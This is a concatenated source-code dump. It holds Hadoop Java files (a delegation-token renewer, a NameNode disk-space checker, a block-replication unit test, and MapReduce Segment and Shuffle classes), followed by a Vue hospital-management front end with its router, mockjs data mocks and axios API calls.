} catch (IOException ie) {
try {
fs.delegationToken =
(Token<DelegationTokenIdentifier>) fs.getDelegationToken(null);
} catch (IOException ie2) {
throw new IOException("Can't renew or get new delegation token ",
ie);
}
}
return null;
}
});
}
}
return fs != null;
}
public String toString() {
StringBuilder result = new StringBuilder();
HftpFileSystem fs = weakFs.get();
if (fs == null) {
return "evaporated token renew";
}
synchronized (fs) {
result.append(fs.delegationToken);
}
result.append(" renew in ");
result.append(getDelay(TimeUnit.SECONDS));
result.append(" secs");
return result.toString();
}
}
/**
* A daemon thread that waits for the next file system to renew.
*/
private static class RenewerThread extends Thread {
private DelayQueue<RenewAction> queue = new DelayQueue<RenewAction>();
// wait for 95% of a day between renewals
private final int RENEW_CYCLE = (int) (0.95 * 24 * 60 * 60 * 1000);
public RenewerThread() {
super("HFTP Delegation Token Renewer");
setDaemon(true);
}
public void addTokenToRenew(HftpFileSystem fs) {
queue.add(new RenewAction(RENEW_CYCLE + System.currentTimeMillis(),fs));
}
public void run() {
RenewAction action = null;
while (true) {
try {
action = queue.take();
if (action.renew()) {
action.setNewTime(RENEW_CYCLE + System.currentTimeMillis());
queue.add(action);
}
action = null;
} catch (InterruptedException ie) {
return;
} catch (Exception ie) {
if (action != null) {
LOG.warn("Failure to renew token " + action, ie);
} else {
LOG.warn("Failure in renew queue", ie);
}
}
}
}
}
private static RenewerThread renewer = new RenewerThread();
static {
renewer.start();
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/server/namenode/NameNodeResourceChecker.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import java.io.File;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.DF;
import org.apache.hadoop.hdfs.DFSConfigKeys;
//import com.google.common.annotations.VisibleForTesting;
/**
*
* NameNodeResourceChecker provides a method -
* <code>hasAvailableDiskSpace</code> - which will return true if and only if
* the NameNode has disk space available on all volumes which are configured to
* be checked. Volumes containing file system name/edits dirs are added by
* default, and arbitrary extra volumes may be configured as well.
*/
public class NameNodeResourceChecker {
private static final Log LOG = LogFactory.getLog(NameNodeResourceChecker.class.getName());
// Space (in bytes) reserved per volume.
private long duReserved;
private final Configuration conf;
private Map<String, DF> volumes;
/**
* Create a NameNodeResourceChecker, which will check the name dirs and edits
* dirs set in <code>conf</code>.
*
* @param conf
* @throws IOException
*/
public NameNodeResourceChecker(Configuration conf) throws IOException {
this.conf = conf;
volumes = new HashMap<String, DF>();
duReserved = conf.getLong(DFSConfigKeys.DFS_NAMENODE_DU_RESERVED_KEY,
DFSConfigKeys.DFS_NAMENODE_DU_RESERVED_DEFAULT);
Collection<File> extraCheckedVolumes = new ArrayList<File>();
for (String filePath : conf.getTrimmedStringCollection(
DFSConfigKeys.DFS_NAMENODE_CHECKED_VOLUMES_KEY)) {
extraCheckedVolumes.add(new File(filePath));
}
addDirsToCheck(FSNamesystem.getNamespaceDirs(conf));
addDirsToCheck(FSNamesystem.getNamespaceEditsDirs(conf));
addDirsToCheck(extraCheckedVolumes);
}
/**
* Add the passed-in directories to the list of volumes to check.
*
* @param directoriesToCheck
* The directories whose volumes will be checked for available space.
* @throws IOException
*/
private void addDirsToCheck(Collection<File> directoriesToCheck)
throws IOException {
for (File directory : directoriesToCheck) {
File dir = new File(directory.toURI().getPath());
if (!dir.exists()) {
throw new IOException("Missing directory "+dir.getAbsolutePath());
}
DF df = new DF(dir, conf);
volumes.put(df.getFilesystem(), df);
}
}
/**
* Return true if disk space is available on at least one of the configured
* volumes.
*
* @return True if the configured amount of disk space is available on at
* least one volume, false otherwise.
* @throws IOException
*/
boolean hasAvailableDiskSpace()
throws IOException {
return getVolumesLowOnSpace().size() < volumes.size();
}
/**
* Return the set of directories which are low on space.
* @return the set of directories whose free space is below the threshold.
* @throws IOException
*/
Collection<String> getVolumesLowOnSpace() throws IOException {
if (LOG.isDebugEnabled()) {
LOG.debug("Going to check the following volumes disk space: " + volumes);
}
Collection<String> lowVolumes = new ArrayList<String>();
for (DF volume : volumes.values()) {
long availableSpace = volume.getAvailable();
String fileSystem = volume.getFilesystem();
if (LOG.isDebugEnabled()) {
LOG.debug("Space available on volume '" + fileSystem + "' is " + availableSpace);
}
if (availableSpace < duReserved) {
LOG.warn("Space available on volume '" + fileSystem + "' is "
+ availableSpace +
", which is below the configured reserved amount " + duReserved);
lowVolumes.add(volume.getFilesystem());
}
}
return lowVolumes;
}
//@VisibleForTesting
void setVolumes(Map<String, DF> volumes) {
this.volumes = volumes;
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/server/namenode/TestBlockManager.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import static org.junit.Assert.*;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import org.apache.commons.logging.impl.Log4JLogger;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hdfs.DFSClient;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.apache.hadoop.hdfs.protocol.Block;
import org.apache.hadoop.hdfs.protocol.DatanodeID;
import org.apache.hadoop.hdfs.protocol.DatanodeInfo;
import org.apache.hadoop.hdfs.protocol.FSConstants;
import org.apache.hadoop.hdfs.server.datanode.DataNode;
import org.apache.hadoop.hdfs.server.namenode.BlocksMap.BlockInfo;
import org.apache.hadoop.hdfs.server.namenode.FSNamesystem;
import org.apache.hadoop.hdfs.server.namenode.INodeFile;
import org.apache.hadoop.hdfs.server.protocol.BlockCommand;
import org.apache.hadoop.net.NetworkTopology;
import org.apache.hadoop.util.StringUtils;
import org.apache.log4j.Level;
import org.junit.After;
import org.junit.Before;
import org.junit.Ignore;
import org.junit.Test;
import org.mockito.Mockito;
public class TestBlockManager {
{
((Log4JLogger)NameNode.stateChangeLog).getLogger().setLevel(Level.ALL);
((Log4JLogger)LeaseManager.LOG).getLogger().setLevel(Level.ALL);
((Log4JLogger)FSNamesystem.LOG).getLogger().setLevel(Level.ALL);
((Log4JLogger)DataNode.LOG).getLogger().setLevel(Level.ALL);
((Log4JLogger)DFSClient.LOG).getLogger().setLevel(Level.ALL);
}
private final List<DatanodeDescriptor> nodes = Arrays.asList(
new DatanodeDescriptor[] {
new DatanodeDescriptor(new DatanodeID("h1:5020"), "/rackA"),
new DatanodeDescriptor(new DatanodeID("h2:5020"), "/rackA"),
new DatanodeDescriptor(new DatanodeID("h3:5020"), "/rackA"),
new DatanodeDescriptor(new DatanodeID("h4:5020"), "/rackB"),
new DatanodeDescriptor(new DatanodeID("h5:5020"), "/rackB"),
new DatanodeDescriptor(new DatanodeID("h6:5020"), "/rackB")
});
private final List<DatanodeDescriptor> rackA = nodes.subList(0, 3);
private final List<DatanodeDescriptor> rackB = nodes.subList(3, 6);
/**
* Some of these tests exercise code which has some randomness involved -
* ie even if there's a bug, they may pass because the random node selection
* chooses the correct result.
*
* Since they're true unit tests and run quickly, we loop them a number
* of times trying to trigger the incorrect behavior.
*/
private static final int NUM_TEST_ITERS = 30;
private static final int BLOCK_SIZE = 64*1024;
private Configuration conf;
private FSNamesystem fsn;
private MiniDFSCluster cluster;
@Before
public void setupMockCluster() throws IOException {
conf = new Configuration();
cluster = new MiniDFSCluster(conf, 0, true, null);
fsn = cluster.getNameNode().getNamesystem();
}
@After
public void tearDownCluster() throws IOException {
if (cluster != null) {
cluster.shutdown();
}
}
private void addNodes(Iterable<DatanodeDescriptor> nodesToAdd) throws IOException {
NetworkTopology cluster = fsn.clusterMap;
// construct network topology
for (DatanodeDescriptor dn : nodesToAdd) {
cluster.add(dn);
dn.updateHeartbeat(
2*FSConstants.MIN_BLOCKS_FOR_WRITE*BLOCK_SIZE, 0L,
2*FSConstants.MIN_BLOCKS_FOR_WRITE*BLOCK_SIZE, 0, 0);
fsn.unprotectedAddDatanode(dn);
fsn.unprotectedRegisterInHeartbeatMap(dn);
assertNotNull(fsn.getDatanode(dn));
}
}
/**
* Test that replication of under-replicated blocks is detected
* and basically works
*/
@Test
public void testBasicReplication() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doBasicTest(i);
}
}
/**
* Regression test for HDFS-1480
* - Cluster has 2 racks, A and B, each with three nodes.
* - Block initially written on A1, A2, B1
* - Admin decommissions two of these nodes (let's say A1 and A2 but it doesn't matter)
* - Re-replication should respect rack policy
*/
@Test
public void testTwoOfThreeNodesDecomissioned() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doTestTwoOfThreeNodesDecomissioned(i);
}
}
@Test
public void testAllNodesHoldingReplicasDecomissioned() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doTestAllNodesHoldingReplicasDecomissioned(i);
}
}
@Test
public void testOneOfTwoRacksDecomissioned() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doTestOneOfTwoRacksDecomissioned(i);
}
}
/**
* Unit test version of testSufficientlyReplBlocksUsesNewRack
*
* This test is currently ignored, since 0.20 doesn't check replication
* policy on sufficiently replicated blocks. If an additional rack is
* added to a 1-rack cluster, the replication level needs to be boosted
* and brought back down to attain the proper policy.
**/
@Test
@Ignore
public void testSufficientlyReplBlocksUsesNewRack() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doTestSufficientlyReplBlocksUsesNewRack(i);
}
}
private void doTestSufficientlyReplBlocksUsesNewRack(int testIndex) {
// Originally on only nodes in rack A.
List<DatanodeDescriptor> origNodes = rackA;
BlockInfo blockInfo = addBlockOnNodes((long)testIndex, origNodes);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertEquals(2, pipeline.length); // single new copy
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertTrue("Destination of replication should be on the other rack. " +
"Was: " + pipeline[1],
nodeInList(pipeline[1], rackB));
}
private void doBasicTest(int testIndex) {
List<DatanodeDescriptor> origNodes = nodesAtIndexes(0, 1);
BlockInfo blockInfo = addBlockOnNodes((long)testIndex, origNodes);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertEquals(2, pipeline.length);
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertTrue("Destination of replication should be on the other rack. " +
"Was: " + pipeline[1],
nodeInList(pipeline[1], rackB));
}
private void doTestTwoOfThreeNodesDecomissioned(int testIndex) throws Exception {
// Block originally on A1, A2, B1
List<DatanodeDescriptor> origNodes = nodesAtIndexes(0, 1, 3);
BlockInfo blockInfo = addBlockOnNodes(testIndex, origNodes);
// Decommission two of the nodes (A1, A2)
List<DatanodeDescriptor> decomNodes = startDecommission(0, 1);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertEquals("Should have two targets", 3, pipeline.length);
boolean foundOneOnRackA = false;
for (int i = 1; i < pipeline.length; i++) {
DatanodeInfo target = pipeline[i];
if (nodeInList(target, rackA)) {
foundOneOnRackA = true;
}
assertFalse(nodeInList(target, decomNodes));
assertFalse(nodeInList(target, origNodes));
}
assertTrue("Should have at least one target on rack A. Pipeline: " +
StringUtils.joinObjects(",", Arrays.asList(pipeline)),
foundOneOnRackA);
}
private boolean nodeInList(DatanodeInfo node,
List<DatanodeDescriptor> nodeList) {
for (DatanodeDescriptor candidate : nodeList) {
if (node.getName().equals(candidate.getName())) {
return true;
}
}
return false;
}
private void doTestAllNodesHoldingReplicasDecomissioned(int testIndex) throws Exception {
// Block originally on A1, A2, B1
List<DatanodeDescriptor> origNodes = nodesAtIndexes(0, 1, 3);
BlockInfo blockInfo = addBlockOnNodes(testIndex, origNodes);
// Decommission all of the nodes
List<DatanodeDescriptor> decomNodes = startDecommission(0, 1, 3);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertEquals("Should have three targets", 4, pipeline.length);
boolean foundOneOnRackA = false;
boolean foundOneOnRackB = false;
for (int i = 1; i < pipeline.length; i++) {
DatanodeInfo target = pipeline[i];
if (nodeInList(target, rackA)) {
foundOneOnRackA = true;
} else if (nodeInList(target, rackB)) {
foundOneOnRackB = true;
}
assertFalse(nodeInList(target, decomNodes));
assertFalse(nodeInList(target, origNodes));
}
assertTrue("Should have at least one target on rack A. Pipeline: " +
StringUtils.joinObjects(",", Arrays.asList(pipeline)),
foundOneOnRackA);
assertTrue("Should have at least one target on rack B. Pipeline: " +
StringUtils.joinObjects(",", Arrays.asList(pipeline)),
foundOneOnRackB);
}
private void doTestOneOfTwoRacksDecomissioned(int testIndex) throws Exception {
System.out.println("Begin iter " + testIndex);
// Block originally on A1, A2, B1
List<DatanodeDescriptor> origNodes = nodesAtIndexes(0, 1, 3);
BlockInfo blockInfo = addBlockOnNodes(testIndex, origNodes);
// Decommission all of the nodes in rack A
List<DatanodeDescriptor> decomNodes = startDecommission(0, 1, 2);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertEquals("Should have 2 targets", 3, pipeline.length);
boolean foundOneOnRackB = false;
for (int i = 1; i < pipeline.length; i++) {
DatanodeInfo target = pipeline[i];
if (nodeInList(target, rackB)) {
foundOneOnRackB = true;
}
assertFalse(nodeInList(target, decomNodes));
assertFalse(nodeInList(target, origNodes));
}
assertTrue("Should have at least one target on rack B. Pipeline: " +
StringUtils.joinObjects(",", Arrays.asList(pipeline)),
foundOneOnRackB);
}
private List<DatanodeDescriptor> nodesAtIndexes(int ... indexes) {
List<DatanodeDescriptor> ret = new ArrayList<DatanodeDescriptor>();
for (int idx : indexes) {
ret.add(nodes.get(idx));
}
return ret;
}
private List<DatanodeDescriptor> startDecommission(int ... indexes) {
List<DatanodeDescriptor> nodes = nodesAtIndexes(indexes);
for (DatanodeDescriptor node : nodes) {
node.startDecommission();
}
return nodes;
}
private BlockInfo addBlockOnNodes(long blockId, List<DatanodeDescriptor> nodes) {
INodeFile iNode = Mockito.mock(INodeFile.class);
Mockito.doReturn((short)3).when(iNode).getReplication();
Block block = new Block(blockId);
BlockInfo blockInfo = fsn.blocksMap.addINode(block, iNode);
// Block originally on A1, A2, B1
for (DatanodeDescriptor dn : nodes) {
blockInfo.addNode(dn);
}
return blockInfo;
}
private DatanodeInfo[] scheduleSingleReplication(Block block) {
assertEquals("Block not initially pending replication",
0, fsn.pendingReplications.getNumReplicas(block));
assertTrue("computeReplicationWork should indicate replication is needed",
fsn.computeReplicationWorkForBlock(block, 1));
assertTrue("replication is pending after work is computed",
fsn.pendingReplications.getNumReplicas(block) > 0);
List<PendingReplPipeline> pipelines = getAllPendingReplications();
assertEquals(1, pipelines.size());
assertEquals(block, pipelines.get(0).block);
return pipelines.get(0).pipeline;
}
private List<PendingReplPipeline> getAllPendingReplications() {
List<PendingReplPipeline> pendingPipelines = new ArrayList<PendingReplPipeline>();
for (DatanodeDescriptor dn : nodes) {
BlockCommand replCommand = dn.getReplicationCommand(10);
if (replCommand == null) continue;
Block[] blocks = replCommand.getBlocks();
DatanodeInfo[][] allTargets = replCommand.getTargets();
for (int i = 0; i < blocks.length; i++) {
DatanodeInfo[] targets = allTargets[i];
Block block = blocks[i];
DatanodeInfo[] pipeline = new DatanodeInfo[1 + targets.length];
pipeline[0] = dn;
System.arraycopy(targets, 0, pipeline, 1, targets.length);
pendingPipelines.add(new PendingReplPipeline(block, pipeline));
}
}
return pendingPipelines;
}
private static class PendingReplPipeline {
final Block block;
final DatanodeInfo[] pipeline;
public PendingReplPipeline(Block block, DatanodeInfo[] pipeline) {
super();
this.block = block;
this.pipeline = pipeline;
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/Segment.java<|end_filename|>
/**
*
*/
package org.apache.hadoop.mapred;
import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.mapred.IFile.IStreamWriter;
import org.apache.hadoop.mapred.IFile.Reader;
import org.apache.hadoop.util.Progressable;
public class Segment<K extends Object, V extends Object> implements
Comparable<Segment<K, V>> {
Reader<K, V> reader = null;
final DataInputBuffer key = new DataInputBuffer();
final DataInputBuffer value = new DataInputBuffer();
Configuration conf = null;
FileSystem fs = null;
Path file = null;
boolean preserve = false;
CompressionCodec codec = null;
long segmentOffset = 0;
long segmentLength = -1;
long segmentRawLenght = -1;
Counters.Counter mapOutputsCounter = null;
public Segment(Configuration conf,
FileSystem fs,
Path file,
CompressionCodec codec,
boolean preserve) throws IOException {
this(conf, fs, file, codec, preserve, null);
}
public Segment(Configuration conf,
FileSystem fs,
Path file,
CompressionCodec codec,
boolean preserve,
Counters.Counter mergedMapOutputsCounter) throws IOException {
this(conf, fs, file, 0, fs.getFileStatus(file).getLen(), -1, codec,
preserve, mergedMapOutputsCounter);
}
public Segment(Configuration conf,
FileSystem fs,
Path file,
long segmentOffset,
long segmentLength,
CompressionCodec codec,
boolean preserve) throws IOException {
this(conf, fs, file, segmentOffset, segmentLength, -1, codec, preserve,
null);
}
public Segment(Configuration conf,
FileSystem fs,
Path file,
long segmentOffset,
long segmentLength,
long segmentRawLength,
CompressionCodec codec,
boolean preserve) throws IOException {
this(conf, fs, file, segmentOffset, segmentLength, segmentRawLength,
codec, preserve, null);
}
public Segment(Configuration conf,
FileSystem fs,
Path file,
long segmentOffset,
long segmentLength,
long segmentRawLength,
CompressionCodec codec,
boolean preserve,
Counters.Counter mergedMapOutputsCounter) throws IOException {
this.conf = conf;
this.fs = fs;
this.file = file;
this.codec = codec;
this.preserve = preserve;
this.segmentOffset = segmentOffset;
this.segmentLength = segmentLength;
this.segmentRawLenght = segmentRawLength;
this.mapOutputsCounter = mergedMapOutputsCounter;
}
public Segment(Reader<K, V> reader, boolean preserve) {
this(reader, preserve, null);
}
public Segment(Reader<K, V> reader,
boolean preserve,
Counters.Counter mapOutputsCounter) {
this.reader = reader;
this.preserve = preserve;
this.segmentLength = reader.getLength();
this.mapOutputsCounter = mapOutputsCounter;
}
public void init(Counters.Counter readsCounter) throws IOException {
if (reader == null) {
FSDataInputStream in = fs.open(file);
in.seek(segmentOffset);
reader = new Reader<K, V>(conf, in, segmentLength, segmentRawLenght,
codec, readsCounter);
}
if (mapOutputsCounter != null) {
mapOutputsCounter.increment(1);
}
}
public long getRawLen() {
return this.segmentRawLenght;
}
public boolean inMemory() {
return fs == null;
}
public DataInputBuffer getKey() {
return key;
}
public DataInputBuffer getValue() throws IOException {
nextRawValue();
return value;
}
public long getLength() {
return (reader == null) ? segmentLength : reader.getLength();
}
public boolean nextRawKey() throws IOException {
return reader.nextRawKey(key);
}
private void nextRawValue() throws IOException {
reader.nextRawValue(value);
}
void closeReader() throws IOException {
if (reader != null) {
reader.close();
reader = null;
}
}
public void close() throws IOException {
closeReader();
if (!preserve && fs != null) {
fs.delete(file, false);
}
}
public long getPosition() throws IOException {
return reader.getPosition();
}
// This method is used by BackupStore to extract the
// absolute position after a reset
long getActualPosition() throws IOException {
return segmentOffset + reader.getPosition();
}
Reader<K, V> getReader() {
return reader;
}
// This method is used by BackupStore to reinitialize the
// reader to start reading from a different segment offset
void reinitReader(int offset) throws IOException {
if (!inMemory()) {
closeReader();
segmentOffset = offset;
segmentLength = fs.getFileStatus(file).getLen() - segmentOffset;
init(null);
}
}
public void writeTo(
IStreamWriter writer,
Progressable progressable,
Configuration conf) throws IOException {
reader.dumpTo(writer, progressable, conf);
}
@Override
public int compareTo(Segment<K, V> other) {
if (this.getLength() == other.getLength()) {
return 0;
}
return this.getLength() < other.getLength() ? -1 : 1;
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/task/reduce/Shuffle.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred.task.reduce;
import java.io.IOException;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.mapred.Counters;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.JvmContext;
import org.apache.hadoop.mapred.MapOutputFile;
import org.apache.hadoop.mapred.RawKeyValueIterator;
import org.apache.hadoop.mapred.Reducer;
import org.apache.hadoop.mapred.Reporter;
import org.apache.hadoop.mapred.Segment;
import org.apache.hadoop.mapred.Task;
import org.apache.hadoop.mapred.TaskStatus;
import org.apache.hadoop.mapred.TaskUmbilicalProtocol;
import org.apache.hadoop.mapred.Task.CombineOutputCollector;
import org.apache.hadoop.mapred.TaskAttemptID;
import org.apache.hadoop.util.Progress;
public class Shuffle<K, V> implements ExceptionReporter
{
private static final Log LOG = LogFactory.getLog(Shuffle.class);
private static final int PROGRESS_FREQUENCY = 2000;
private final TaskAttemptID reduceId;
private final JobConf jobConf;
private final Reporter reporter;
private final ShuffleClientMetrics metrics;
private final TaskUmbilicalProtocol umbilical;
private final ShuffleScheduler<K, V> scheduler;
private final MergeManager<K, V> merger;
private Throwable throwable = null;
private String throwingThreadName = null;
private final Progress copyPhase;
private final TaskStatus taskStatus;
private final Task reduceTask; // Used for status updates
private final JvmContext jvmContext;
public Shuffle(TaskAttemptID reduceId, JobConf jobConf, FileSystem localFS,
TaskUmbilicalProtocol umbilical, LocalDirAllocator localDirAllocator,
Reporter reporter, CompressionCodec codec, Class<? extends Reducer> combinerClass,
CombineOutputCollector<K, V> combineCollector, Counters.Counter spilledRecordsCounter,
Counters.Counter reduceCombineInputCounter, Counters.Counter shuffledMapsCounter,
Counters.Counter reduceShuffleBytes, Counters.Counter failedShuffleCounter,
Counters.Counter mergedMapOutputsCounter, TaskStatus status, Progress copyPhase,
Progress mergePhase, Task reduceTask, MapOutputFile mapOutputFile, JvmContext jvmContext)
{
this.reduceId = reduceId;
this.jobConf = jobConf;
this.umbilical = umbilical;
this.reporter = reporter;
this.metrics = new ShuffleClientMetrics(reduceId, jobConf);
this.copyPhase = copyPhase;
this.taskStatus = status;
this.reduceTask = reduceTask;
this.jvmContext = jvmContext;
scheduler = new ShuffleScheduler<K, V>(jobConf, status, this, copyPhase,
shuffledMapsCounter, reduceShuffleBytes, failedShuffleCounter);
merger = new MergeManager<K, V>(reduceId, jobConf, localFS, localDirAllocator, reporter,
codec, combinerClass, combineCollector, spilledRecordsCounter,
reduceCombineInputCounter, mergedMapOutputsCounter, this, mergePhase, mapOutputFile);
}
@SuppressWarnings("unchecked")
public RawKeyValueIterator run() throws IOException, InterruptedException
{
// Start the map-completion events fetcher thread
final EventFetcher<K, V> eventFetcher = new EventFetcher<K, V>(reduceId, umbilical,
scheduler, this,jvmContext,jobConf.getInt("mapreduce.shuffle.port", 8080));
eventFetcher.start();
// Start the map-output fetcher threads
final int numFetchers = jobConf.getInt("mapred.reduce.parallel.copies", 5);
Fetcher<K, V>[] fetchers = new Fetcher[numFetchers];
for (int i = 0; i < numFetchers; ++i)
{
fetchers[i] = new Fetcher<K, V>(jobConf, reduceId, scheduler, merger, reporter,
metrics, this, reduceTask.getJobTokenSecret());
fetchers[i].start();
}
// Wait for shuffle to complete successfully
while (!scheduler.waitUntilDone(PROGRESS_FREQUENCY))
{
reporter.progress();
synchronized (this)
{
if (throwable != null)
{
throw new ShuffleError("error in shuffle in " + throwingThreadName, throwable);
}
}
}
// Stop the event-fetcher thread
eventFetcher.interrupt();
try
{
eventFetcher.join();
}
catch (Throwable t)
{
LOG.info("Failed to stop " + eventFetcher.getName(), t);
}
// Stop the map-output fetcher threads
for (Fetcher<K, V> fetcher : fetchers)
{
fetcher.interrupt();
}
for (Fetcher<K, V> fetcher : fetchers)
{
fetcher.join();
}
fetchers = null;
// stop the scheduler
scheduler.close();
copyPhase.complete(); // copy is already complete
LOG.info("Shuffle(Copy) phase has complete!");
taskStatus.setPhase(TaskStatus.Phase.SORT);
reduceTask.statusUpdate(umbilical);
// Finish the on-going merges...
RawKeyValueIterator kvIter = null;
try
{
kvIter = merger.close();
}
catch (Throwable e)
{
throw new ShuffleError("Error while doing final merge ", e);
}
// Sanity check
synchronized (this)
{
if (throwable != null)
{
throw new ShuffleError("error in shuffle in " + throwingThreadName, throwable);
}
}
return kvIter;
}
public RawKeyValueIterator getUnsortedKVIterator() {
return new RawKeyValueIterator() {
private Segment<K, V> current = null;
private DataInputBuffer key;
private DataInputBuffer value;
private Progress progress = new Progress();
private int count = 0;
private final int totalMaps = jobConf.getNumMapTasks();
@Override
public boolean next() throws IOException {
if (current == null) {
current = merger.getMapOutput();
if (current == null)
return false;
current.init(null);
count++;
progress.set((float) count / totalMaps);
}
if (!current.nextRawKey()) {
current.close();
current = null;
return next();
}
key = current.getKey();
value = current.getValue();
return true;
}
@Override
public DataInputBuffer getKey() throws IOException {
return key;
}
@Override
public DataInputBuffer getValue() throws IOException {
return value;
}
@Override
public Progress getProgress() {
return progress;
}
@Override
public void close() throws IOException {
// nothing
}
};
}
public synchronized void reportException(Throwable t)
{
if (throwable == null)
{
throwable = t;
throwingThreadName = Thread.currentThread().getName();
// Notify the scheduler so that the reporting thread finds the
// exception immediately.
synchronized (scheduler)
{
scheduler.notifyAll();
}
}
}
public static class ShuffleError extends IOException
{
private static final long serialVersionUID = 5753909320586607881L;
ShuffleError(String msg, Throwable t)
{
super(msg, t);
}
}
}
| karim7262/hadoop3 |
<|start_filename|>src/router/index.js<|end_filename|>
import Vue from 'vue'
import Router from 'vue-router'
import home from './home'
import common from './common'
import doctor from './doctor'
import statistics from './statistics'
import basicInfo from './basicInfo'
import pharmacy from './pharmacy'
import register from './register'
import tech from './tech'
import patient from './patient'
Vue.use(Router);
export default new Router({
mode: 'hash', // https://router.vuejs.org/api/#mode
linkActiveClass: 'open active',
scrollBehavior: () => ({ y: 0 }),
routes: [
home,
common,
doctor,
basicInfo,
statistics,
tech,
register,
pharmacy,
patient
]
})
<|start_filename|>src/mock/pharmacy.js<|end_filename|>
import Mock from "mockjs";
export default function () {
const Random = Mock.Random;
Mock.mock(RegExp('/api/countPatientList' + ".*"), "get", {
code:true,
total:100
});
Mock.mock(RegExp('/api/getPatientList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 4; i++) {
let listObject = {
id: Random.integer(100, 9999),
user_name: Random.cword(2, 4),
pay_way: Random.cword(2, 4),
status: Random.pick(['primary','secondary']),
sex:Random.pick(['男','女']),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
}
<|start_filename|>src/mock/basicInfo.js<|end_filename|>
import Mock from "mockjs";
export default function () {
const Random = Mock.Random;
Mock.mock(RegExp('/api/getDepartmentCount' + ".*"), "get", {
code:true,
total:100
});
Mock.mock(RegExp('/api/getDepartmentList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 99; i++) {
let listObject = {
department_Code: Random.integer(100, 9999),
department_Name: Random.cword(2, 4),
department_Type:Random.pick(['内科','外科']),
department_Category: Random.pick(['中医','西医']),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
}
<|start_filename|>src/api/api.js<|end_filename|>
import axios from 'axios';
let base = '';
let hospital = 'http://localhost:8000/hospital';
export const requestLogin = params => { return axios.post(`${base}/login`, params).then(res => res.data); };
export const getUserList = params => { return axios.get(`${base}/user/list`, { params: params }); };
export const getUserListPage = params => { return axios.get(`${base}/user/listpage`, { params: params }); };
export const removeUser = params => { return axios.get(`${base}/user/remove`, { params: params }); };
export const batchRemoveUser = params => { return axios.get(`${base}/user/batchremove`, { params: params }); };
